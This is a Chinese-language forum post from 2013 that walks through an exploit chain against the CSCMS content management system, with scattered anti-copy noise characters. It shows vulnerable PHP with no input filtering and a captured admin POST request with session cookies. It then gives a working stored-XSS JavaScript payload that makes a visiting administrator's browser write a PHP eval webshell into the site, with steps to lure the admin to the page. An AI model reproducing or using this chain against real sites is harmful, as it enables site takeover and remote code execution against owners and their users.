|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题- p$ U* z: p6 L0 g
官网已经修补了,所以重新下了源码
1 ~0 Z1 y0 S. t) ]因为 后台登入 还需要认证码 所以 注入就没看了。% @8 y2 L+ s5 _; H
存在 xss2 |6 s D* R1 `; u- l3 k
漏洞文件 user/member/skin_edit.php8 s# }" d, }2 W: ^8 b
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:% w' m6 k1 T! d: h0 i! H
7 d5 Q8 y+ W4 x0 W- q: T( ^</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
* q! A" t2 @' W: C+ L( ^9 Y 9 F, ^+ F% B5 p
</textarea></td></tr>* J* B$ ~$ ]! @* T E3 z
2 g r# U9 N7 f9 d9 S5 n3 T/ E
user/do.php . P% I+ H1 E1 X1 j# B" W
/ D: q0 K' W2 R' m" f
" |( n! `& e6 \* C- xif($op=='zl'){ //资料7 T( s( E# T, h6 Q' K4 H' m
5 c+ W. m9 X& U if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
, c: k: }* l* u$ G; r* w0 O5 R exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
7 y1 T& k2 l$ U3 ]7 \9 f
- \4 q% x' m! O. C* C. A' ^6 D3 } $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',& c3 p, O' ^4 j' u$ |0 k. @- r8 @8 O
' A$ u+ ]8 |6 e* I6 @8 J' @% O
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
& ]% ]0 ^) z/ }8 G" Y where CS_Name='".$cscms_name."'";% O% u3 P0 q, K- y# w
% n F* k5 [# I9 u% \7 X
if($db->query($sql)){
. g+ I) c6 ]9 C" _ $ s7 |; w, M7 t4 T0 ]2 B
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
' Q! c/ }) { f- r8 ^6 ]
# f/ U% V, B% U5 c; m2 l$ \: U }else{5 h) D& I3 n( O4 M! q, y; |
4 E6 p7 P1 ~* F! l
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));9 L# X+ K4 G. d& g5 q
1 X- ~4 R# Y# j) l" w. T4 A
}! \8 l) U( s3 Y) L+ s9 O
+ @0 s5 V6 G& T
( r' F8 s" i6 t d5 F没有 过滤导致xss产生。
! L' x( c2 I# S4 r* T后台 看了下 很奇葩的是可以写任意格式文件。。
( r, A. B, p% ]! F+ K抓包。。
/ y, H# C/ g$ T5 C5 e
3 U& q! f0 D0 a& |, {
/ C$ l. D4 W5 r1 K/ Q6 @本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
7 W( U H5 L' r: E" O# C
5 V2 t$ t+ q" k( U( h9 U- ^Accept: text/html, application/xhtml+xml, */*
V5 a5 U7 W" G4 K! q& M T
( ?9 L4 x4 K4 R! t) V# VReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php, Q8 ~5 |6 |2 {+ p/ o
, \8 _- K+ g( v2 y: M1 w
Accept-Language: zh-CN
8 y) f2 s8 v' |
) `0 B3 D# _- QUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
: ?7 Q, t3 K6 L* f- H% c2 n# M 8 u" Z3 z5 ]5 O o; f' f
Content-Type: application/x-www-form-urlencoded6 u; i* s( s: ~) R& v1 y$ v
, m' I3 |$ N1 c% U7 d: I# L4 u) JAccept-Encoding: gzip, deflate2 W5 f9 f9 m: ^# X
& O+ T. c- r5 ?
Host: 127.0.0.1; e7 ^0 t8 h2 e4 l% D
3 y; D e) m- r
Content-Length: 38
* Q G$ M# z0 [+ C6 Z; d4 l
' q. H' U% \; Z1 f) }DNT: 1: o+ v6 l, v5 K" _) ?' s( i5 [
, j# L4 }# H5 x( E# b c: dConnection: Keep-Alive
, h! ^: ^! G' a, H: W" B 0 q1 s+ r: M( M4 o0 {
Cache-Control: no-cache8 Y" v) E( g4 ? N
- p7 U% Z7 d/ A% Q8 K
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
* \0 f2 g7 U0 ?) ~& z8 G) j+ i& Q4 L ) K; e2 x# N8 y$ U0 z
4 s7 S4 k' C) C0 ]( E& T2 ^& T
name=aaa.php&content=%3Cs%3E%3Ca%25%3E+ C, y' Z5 x9 }! c5 l% s/ }
0 |0 x& M0 G1 {( P% N a3 N! U5 D' p5 F
- N' D+ @2 e$ a
于是 构造js如下。
, G' a# [% @+ O3 f( Z# O7 f, f! ]5 n
本帖隐藏的内容<script> % |! V$ c3 P& a. [/ k# u: \3 h
thisTHost = top.location.hostname;4 \# e+ ]& A/ {# k
^3 m; N I4 ~1 q
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
" d& f; ?" ]9 h1 y; T # [- h6 G- @4 d5 f. C
function PostSubmit(url, data, msg) {
4 j, {' q, A$ J3 | var postUrl = url; k# g: i* }$ h' Y7 w8 z; u6 P
: Y! S0 N7 L- F
var postData = data; / `) p* y) q' U" H2 Y4 B
var msgData = msg;
" b$ |5 w3 `/ H! r var ExportForm = document.createElement("FORM");
' s$ y6 n7 f' \# j- @, ? document.body.appendChild(ExportForm);
7 ?* l+ j. q# e" Z1 Y8 x2 ] ExportForm.method = "POST";
- b" l1 \, \& u3 ?" i var newElement = document.createElement("input");
2 n. Q! t, d) k1 J newElement.setAttribute("name", "name"); ! w2 W) I k3 |4 l; U; w5 j! f" R
newElement.setAttribute("type", "hidden");
& L3 J: x3 D% j8 _" a var newElement2 = document.createElement("input"); W! A. ?- i% r; Y1 b
newElement2.setAttribute("name", "content"); 9 h' t* u- @- V8 R z6 G: p
newElement2.setAttribute("type", "hidden"); % g) O9 i! H# f T" q3 }
ExportForm.appendChild(newElement);
( ]+ k2 b+ O0 y4 v7 Q6 A2 F: n ExportForm.appendChild(newElement2);
) }! n. c) f, F) n7 ^, t newElement.value = postData; " q4 K" N }+ ?% n! R! R
newElement2.value = msgData;
; y' n: M* z' A Y ExportForm.action = postUrl;
: Y. [5 X- I6 _1 ]/ K( g' }& X% c ExportForm.submit(); 1 d ~6 s+ ]1 Z6 X) d4 z' }% I
};
' @7 W! x7 e2 P- A _# |+ F % l) r2 v: I: R) E
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");! b9 n& u! ?6 q* D7 t0 U" P
/ g" d7 ~8 [3 q/ V$ Z1 H</script>
0 r- O$ u8 r! X/ [
" x# o3 a0 n$ Y* e+ V' V; z$ B' _4 K! `: C7 R& X
O" `: ]9 h% a0 ]! `
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入% u& D/ N9 {5 x8 @# K/ ^# U, B8 ], H
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)1 g4 t' x, T+ W
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
) V+ y* }8 W5 O; \5 h# [ G8 P
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对